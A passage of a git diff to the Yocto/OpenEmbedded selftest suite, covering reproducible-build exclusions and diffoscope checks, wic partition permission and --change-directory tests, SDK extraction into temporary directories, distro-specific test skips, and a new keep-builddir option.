+ 'acpica-src',
+ 'babeltrace2-ptest',
+ 'bind',
+ 'bootchart2-doc',
+ 'epiphany',
+ 'gcr',
+ 'glide',
+ 'go-dep',
+ 'go-helloworld',
+ 'go-runtime',
+ 'go_',
+ 'gstreamer1.0-python',
+ 'hwlatdetect',
+ 'kernel-devsrc',
+ 'libcap-ng',
+ 'libjson',
+ 'libproxy',
+ 'lttng-tools-dbg',
+ 'lttng-tools-ptest',
+ 'ltp',
+ 'ovmf-shell-efi',
+ 'parted-ptest',
+ 'perf',
+ 'piglit',
+ 'pybootchartgui',
+ 'qemu',
+ 'quilt-ptest',
+ 'rsync',
+ 'ruby',
+ 'stress-ng',
+ 'systemd-bootchart',
+ 'systemtap',
+ 'valgrind-ptest',
+ 'webkitgtk',
+ ]
+
+def is_excluded(package):
+ package_name = os.path.basename(package)
+ for i in exclude_packages:
+ if package_name.startswith(i):
+ return i
+ return None
+
MISSING = 'MISSING'
DIFFERENT = 'DIFFERENT'
SAME = 'SAME'
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
self.total = []
self.missing = []
self.different = []
+ self.different_excluded = []
self.same = []
+ self.active_exclusions = set()
def add_result(self, r):
self.total.append(r)
if r.status == MISSING:
self.missing.append(r)
elif r.status == DIFFERENT:
- self.different.append(r)
+ exclusion = is_excluded(r.reference)
+ if exclusion:
+ self.different_excluded.append(r)
+ self.active_exclusions.add(exclusion)
+ else:
+ self.different.append(r)
else:
self.same.append(r)
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
self.total.sort()
self.missing.sort()
self.different.sort()
+ self.different_excluded.sort()
self.same.sort()
def __str__(self):
- return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total))
+ return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
+
+ def unused_exclusions(self):
+ return sorted(set(exclude_packages) - self.active_exclusions)
def compare_file(reference, test, diffutils_sysroot):
result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = MISSING
return result
- r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True)
+ r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
if r.status:
result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = SAME
return result
+def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
+ return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
+ **kwargs)
+
+class DiffoscopeTests(OESelftestTestCase):
+ diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
+
+ def test_diffoscope(self):
+ bitbake("diffoscope-native -c addto_recipe_sysroot")
+ diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
+
+ # Check that diffoscope doesn't return an error when the files compare
+ # the same (a general check that diffoscope is working)
+ with tempfile.TemporaryDirectory() as tmpdir:
+ run_diffoscope('A', 'A', tmpdir,
+ native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
+
+ # Check that diffoscope generates an index.html file when the files are
+ # different
+ with tempfile.TemporaryDirectory() as tmpdir:
+ r = run_diffoscope('A', 'B', tmpdir,
+ native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
+
+ self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
+ self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
+
class ReproducibleTests(OESelftestTestCase):
+ # Test the reproducibility of whatever is built between sstate_targets and targets
+
package_classes = ['deb', 'ipk']
- images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline']
+
+ # targets are the things we want to test the reproducibility of
+ targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
+ # sstate targets are things to pull from sstate to potentially cut build/debugging time
+ sstate_targets = []
save_results = False
if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
def setUpLocal(self):
super().setUpLocal()
- needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS']
+ needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
bb_vars = get_bb_vars(needed_vars)
for v in needed_vars:
setattr(self, v.lower(), bb_vars[v])
@@ -150,20 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
PACKAGE_CLASSES = "{package_classes}"
INHIBIT_PACKAGE_STRIP = "1"
TMPDIR = "{tmpdir}"
+ LICENSE_FLAGS_WHITELIST = "commercial"
+ DISTRO_FEATURES_append = ' systemd pam'
''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
tmpdir=tmpdir)
if not use_sstate:
+ if self.sstate_targets:
+ self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
+ self.write_config(config)
+ bitbake(' '.join(self.sstate_targets))
+
# This config fragment will disable using shared and the sstate
# mirror, forcing a complete build from scratch
config += textwrap.dedent('''\
SSTATE_DIR = "${TMPDIR}/sstate"
- SSTATE_MIRROR = ""
+ SSTATE_MIRRORS = "file://.*/.*-native.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
''')
+ self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
self.write_config(config)
d = get_bb_vars(capture_vars)
- bitbake(' '.join(self.images))
+ # targets used to be called images
+ bitbake(' '.join(getattr(self, 'images', self.targets)))
return d
def test_reproducible_builds(self):
@@ -187,6 +290,7 @@ class ReproducibleTests(OESelftestTestCase):
self.logger.info('Non-reproducible packages will be copied to %s', save_dir)
vars_A = self.do_test_build('reproducibleA', self.build_from_sstate)
+
vars_B = self.do_test_build('reproducibleB', False)
# NOTE: The temp directories from the reproducible build are purposely
@@ -201,6 +305,7 @@ class ReproducibleTests(OESelftestTestCase):
deploy_A = vars_A['DEPLOY_DIR_' + c.upper()]
deploy_B = vars_B['DEPLOY_DIR_' + c.upper()]
+ self.logger.info('Checking %s packages for differences...' % c)
result = self.compare_packages(deploy_A, deploy_B, diffutils_sysroot)
self.logger.info('Reproducibility summary for %s: %s' % (c, result))
@@ -209,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
self.write_package_list(package_class, 'missing', result.missing)
self.write_package_list(package_class, 'different', result.different)
+ self.write_package_list(package_class, 'different_excluded', result.different_excluded)
self.write_package_list(package_class, 'same', result.same)
if self.save_results:
@@ -216,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
+ for d in result.different_excluded:
+ self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
+ self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
+
if result.missing or result.different:
- fails.append("The following %s packages are missing or different: %s" %
+ fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
(c, '\n'.join(r.test for r in (result.missing + result.different))))
# Clean up empty directories
@@ -232,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
# Copy jquery to improve the diffoscope output usability
self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
- runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'],
+ run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
if fails:
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
# The delta is intentionally smaller than the timeout, to detect cases where
# we incorrectly apply the timeout more than once.
- TIMEOUT = 5
- DELTA = 3
+ TIMEOUT = 10
+ DELTA = 8
def test_result_okay(self):
result = runCmd("true")
diff --git a/meta/lib/oeqa/selftest/cases/runqemu.py b/meta/lib/oeqa/selftest/cases/runqemu.py
index 7e676bcb41..da22f77b27 100644
--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
bitbake(cls.recipe)
def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
+ # Allow the runner's LoggingThread instance to exit without errors
+ # (such as the exception "Console connection closed unexpectedly")
+ # as qemu will disappear when we shut it down
+ qemu.runner.allowexit()
qemu.run_serial("shutdown -h now")
- # Stop thread will stop the LoggingThread instance used for logging
- # qemu through serial console, stop thread will prevent this code
- # from facing exception (Console connection closed unexpectedly)
- # when qemu was shutdown by the above shutdown command
- qemu.runner.stop_thread()
time_track = 0
try:
while True:
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index cd03069340..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
class TestExport(OESelftestTestCase):
- @classmethod
- def tearDownClass(cls):
- runCmd("rm -rf /tmp/sdk")
- super(TestExport, cls).tearDownClass()
-
def test_testexport_basic(self):
"""
Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
msg = "Couldn't find SDK tarball: %s" % tarball_path
self.assertEqual(os.path.isfile(tarball_path), True, msg)
- # Extract SDK and run tar from SDK
- result = runCmd("%s -y -d /tmp/sdk" % tarball_path)
- self.assertEqual(0, result.status, "Couldn't extract SDK")
+ with tempfile.TemporaryDirectory() as tmpdirname:
+ # Extract SDK and run tar from SDK
+ result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
+ self.assertEqual(0, result.status, "Couldn't extract SDK")
- env_script = result.output.split()[-1]
- result = runCmd(". %s; which tar" % env_script, shell=True)
- self.assertEqual(0, result.status, "Couldn't setup SDK environment")
- is_sdk_tar = True if "/tmp/sdk" in result.output else False
- self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
+ env_script = result.output.split()[-1]
+ result = runCmd(". %s; which tar" % env_script, shell=True)
+ self.assertEqual(0, result.status, "Couldn't setup SDK environment")
+ is_sdk_tar = True if tmpdirname in result.output else False
+ self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
- tar_sdk = result.output
- result = runCmd("%s --version" % tar_sdk)
- self.assertEqual(0, result.status, "Couldn't run tar from SDK")
+ tar_sdk = result.output
+ result = runCmd("%s --version" % tar_sdk)
+ self.assertEqual(0, result.status, "Couldn't run tar from SDK")
class TestImage(OESelftestTestCase):
@@ -161,6 +157,7 @@ class TestImage(OESelftestTestCase):
features += 'PACKAGE_FEED_GPG_NAME = "testuser"\n'
features += 'PACKAGE_FEED_GPG_PASSPHRASE_FILE = "%s"\n' % os.path.join(signing_key_dir, 'key.passphrase')
features += 'GPG_PATH = "%s"\n' % self.gpg_home
+ features += 'PSEUDO_IGNORE_PATHS .= ",%s"\n' % self.gpg_home
self.write_config(features)
# Build core-image-sato and testimage
@@ -178,12 +175,24 @@ class TestImage(OESelftestTestCase):
if "DISPLAY" not in os.environ:
self.skipTest("virgl gtk test must be run inside a X session")
distro = oe.lsb.distro_identifier()
+ if distro and distro.startswith('almalinux'):
+ self.skipTest('virgl isn\'t working with Alma Linux')
+ if distro and distro.startswith('rocky'):
+ self.skipTest('virgl isn\'t working with Rocky Linux')
if distro and distro == 'debian-8':
self.skipTest('virgl isn\'t working with Debian 8')
if distro and distro == 'centos-7':
self.skipTest('virgl isn\'t working with Centos 7')
+ if distro and distro == 'centos-8':
+ self.skipTest('virgl isn\'t working with Centos 8')
+ if distro and distro.startswith('fedora'):
+ self.skipTest('virgl isn\'t working with Fedora')
if distro and distro == 'opensuseleap-15.0':
self.skipTest('virgl isn\'t working with Opensuse 15.0')
+ if distro and distro == 'ubuntu-22.04':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.04')
+ if distro and distro == 'ubuntu-22.10':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.10')
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -219,6 +228,7 @@ class TestImage(OESelftestTestCase):
Author: Alexander Kanavin <alex.kanavin@gmail.com>
"""
import subprocess, os
+ self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
try:
content = os.listdir("/dev/dri")
if len([i for i in content if i.startswith('render')]) == 0:
@@ -226,7 +236,7 @@ class TestImage(OESelftestTestCase):
except FileNotFoundError:
self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
try:
- dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True)
+ dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
except subprocess.CalledProcessError as e:
self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
os.makedirs(os.path.dirname(recipefile))
- srcuri = 'git://' + srcdir + ';protocol=file'
+ srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
filtered_results.append(r)
self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
self.track_for_cleanup(self.distro_specific_sstate + "_old")
shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
bitbake(['-cclean'] + targets)
bitbake(targets)
file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
- self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated)))
+ self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
- self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once)))
+ self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
def test_rebuild_distro_specific_sstate_cross_native_targets(self):
self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
- self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected)))
+ self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
- self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual)))
+ self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual)))
def test_sstate_cache_management_script_using_pr_1(self):
global_config = []
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index 206168ed00..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
localdata.setVar('PN', 'hello')
self.assertEqual('hello', localdata.getVar('BPN'))
+ # The config_data API tp parse_recipe_file is used by:
+ # layerindex-web layerindex/update_layer.py
+ def test_parse_recipe_custom_data(self):
+ with bb.tinfoil.Tinfoil() as tinfoil:
+ tinfoil.prepare(config_only=False, quiet=2)
+ localdata = bb.data.createCopy(tinfoil.config_data)
+ localdata.setVar("TESTVAR", "testval")
+ testrecipe = 'mdadm'
+ best = tinfoil.find_best_provider(testrecipe)
+ if not best:
+ self.fail('Unable to find recipe providing %s' % testrecipe)
+ rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
+ self.assertEqual("testval", rd.getVar('TESTVAR'))
+
def test_list_recipes(self):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=False, quiet=2)
@@ -87,36 +101,38 @@ class TinfoilTests(OESelftestTestCase):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=True)
- tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted'])
+ tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
# Need to drain events otherwise events that were masked may still be in the queue
while tinfoil.wait_event():
pass
pattern = 'conf'
- res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine')
+ res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
self.assertTrue(res)
eventreceived = False
commandcomplete = False
start = time.time()
- # Wait for 10s in total so we'd detect spurious heartbeat events for example
- # The test is IO load sensitive too
- while time.time() - start < 10:
+ # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
+ while (not (eventreceived == True and commandcomplete == True)
+ and (time.time() - start < 120)):
+ # if we received both events (on let's say a good day), we are done
event = tinfoil.wait_event(1)
if event:
if isinstance(event, bb.command.CommandCompleted):
commandcomplete = True
elif isinstance(event, bb.event.FilesMatchingFound):
self.assertEqual(pattern, event._pattern)
- self.assertIn('qemuarm.conf', event._matches)
+ self.assertIn('A', event._matches)
+ self.assertIn('B', event._matches)
eventreceived = True
elif isinstance(event, logging.LogRecord):
continue
else:
self.fail('Unexpected event: %s' % event)
- self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server')
+ self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
def test_setvariable_clean(self):
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 13b6a0cc72..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -62,6 +62,12 @@ def extract_files(debugfs_output):
return [line.split('/')[5].strip() for line in \
debugfs_output.strip().split('/\n')]
+def files_own_by_root(debugfs_output):
+ for line in debugfs_output.strip().split('/\n'):
+ if line.split('/')[3:5] != ['0', '0']:
+ print(debugfs_output)
+ return False
+ return True
class WicTestCase(OESelftestTestCase):
"""Wic test class."""
@@ -84,6 +90,7 @@ class WicTestCase(OESelftestTestCase):
self.skipTest('wic-tools cannot be built due its (intltool|gettext)-native dependency and NLS disable')
bitbake('core-image-minimal')
+ bitbake('core-image-minimal-mtdutils')
WicTestCase.image_is_ready = True
rmtree(self.resultdir, ignore_errors=True)
@@ -506,6 +513,105 @@ part /part2 --source rootfs --ondisk mmcblk0 --fstype=ext4 --include-path %s"""
% (wks_file, self.resultdir), ignore_status=True).status)
os.remove(wks_file)
+ def test_permissions(self):
+ """Test permissions are respected"""
+
+ # prepare wicenv and rootfs
+ bitbake('core-image-minimal core-image-minimal-mtdutils -c do_rootfs_wicenv')
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ t_normal = """
+part / --source rootfs --fstype=ext4
+"""
+ t_exclude = """
+part / --source rootfs --fstype=ext4 --exclude-path=home
+"""
+ t_multi = """
+part / --source rootfs --ondisk sda --fstype=ext4
+part /export --source rootfs --rootfs=core-image-minimal-mtdutils --fstype=ext4
+"""
+ t_change = """
+part / --source rootfs --ondisk sda --fstype=ext4 --exclude-path=etc/   
+part /etc --source rootfs --fstype=ext4 --change-directory=etc
+"""
+ tests = [t_normal, t_exclude, t_multi, t_change]
+
+ try:
+ for test in tests:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write(test)
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ for part in glob(os.path.join(self.resultdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertEqual(True, files_own_by_root(res.output))
+
+ config = 'IMAGE_FSTYPES += "wic"\nWKS_FILE = "%s"\n' % wks_file
+ self.append_config(config)
+ bitbake('core-image-minimal')
+ tmpdir = os.path.join(get_bb_var('WORKDIR', 'core-image-minimal'),'build-wic')
+
+ # check each partition for permission
+ for part in glob(os.path.join(tmpdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertTrue(files_own_by_root(res.output)
+ ,msg='Files permission incorrect using wks set "%s"' % test)
+
+ # clean config and result directory for next cases
+ self.remove_config(config)
+ rmtree(self.resultdir, ignore_errors=True)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory(self):
+ """Test --change-directory wks option."""
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ try:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write("part /etc --source rootfs --fstype=ext4 --change-directory=etc")
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ part1 = glob(os.path.join(self.resultdir, 'temp-*.direct.p1'))[0]
+
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part1))
+ files = extract_files(res.output)
+ self.assertIn('passwd', files)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory_errors(self):
+ """Test --change-directory wks option error handling."""
+ wks_file = 'temp.wks'
+
+ # Absolute argument.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory /usr")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
+ # Argument pointing to parent directory.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory ././..")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
class Wic2(WicTestCase):
def test_bmap_short(self):
@@ -799,14 +905,18 @@ class Wic2(WicTestCase):
@only_for_arch(['i586', 'i686', 'x86_64'])
def test_rawcopy_plugin_qemu(self):
"""Test rawcopy plugin in qemu"""
- # build ext4 and wic images
- for fstype in ("ext4", "wic"):
- config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype
- self.append_config(config)
- self.assertEqual(0, bitbake('core-image-minimal').status)
- self.remove_config(config)
+ # build ext4 and then use it for a wic image
+ config = 'IMAGE_FSTYPES = "ext4"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal').status)
+ self.remove_config(config)
- with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu:
+ config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
+ self.remove_config(config)
+
+ with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
cmd = "grep sda. /proc/partitions |wc -l"
status, output = qemu.run_serial(cmd)
self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
diff --git a/meta/lib/oeqa/selftest/context.py b/meta/lib/oeqa/selftest/context.py
index 33557b1240..be3ec6401f 100644
--- a/meta/lib/oeqa/selftest/context.py
+++ b/meta/lib/oeqa/selftest/context.py
@@ -34,7 +34,7 @@ class NonConcurrentTestSuite(unittest.TestSuite):
(builddir, newbuilddir) = self.setupfunc("-st", None, self.suite)
ret = super().run(result)
os.chdir(builddir)
- if newbuilddir and ret.wasSuccessful():
+ if newbuilddir and ret.wasSuccessful() and self.removefunc:
self.removefunc(newbuilddir)
def removebuilddir(d):
@@ -54,7 +54,7 @@ def removebuilddir(d):
bb.utils.prunedir(d, ionice=True)
class OESelftestTestContext(OETestContext):
- def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None):
+ def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None, keep_builddir=None):
super(OESelftestTestContext, self).__init__(td, logger)
self.machines = machines
@@ -62,6 +62,11 @@ class OESelftestTestContext(OETestContext):
self.config_paths = config_paths
self.newbuilddir = newbuilddir
+ if keep_builddir:
+ self.removebuilddir = None
+ else:
+ self.removebuilddir = removebuilddir
+
def setup_builddir(self, suffix, selftestdir, suite):
builddir = os.environ['BUILDDIR']
if not selftestdir:
@@ -119,9 +124,9 @@ class OESelftestTestContext(OETestContext):
if processes:
from oeqa.core.utils.concurrencytest import ConcurrentTestSuite
- return ConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return ConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
else:
- return NonConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return NonConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
def runTests(self, processes=None, machine=None, skips=[]):
if machine:
@@ -179,6 +184,9 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
action='append', default=None,
help='Exclude all (unhidden) tests that match any of the specified tag(s). (exclude applies before select)')
+ parser.add_argument('-K', '--keep-builddir', action='store_true',
+ help='Keep the test build directory even if all tests pass')
+
parser.add_argument('-B', '--newbuilddir', help='New build directory to use for tests.')
parser.set_defaults(func=self.run)
@@ -235,6 +243,7 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
self.tc_kwargs['init']['config_paths']['localconf'] = os.path.join(builddir, "conf/local.conf")
self.tc_kwargs['init']['config_paths']['bblayers'] = os.path.join(builddir, "conf/bblayers.conf")
self.tc_kwargs['init']['newbuilddir'] = args.newbuilddir
+ self.tc_kwargs['init']['keep_builddir'] = args.keep_builddir
def tag_filter(tags):
if args.exclude_tags:
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
if not self.needclean:
return
self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index 8059cbce3e..024261410e 100644
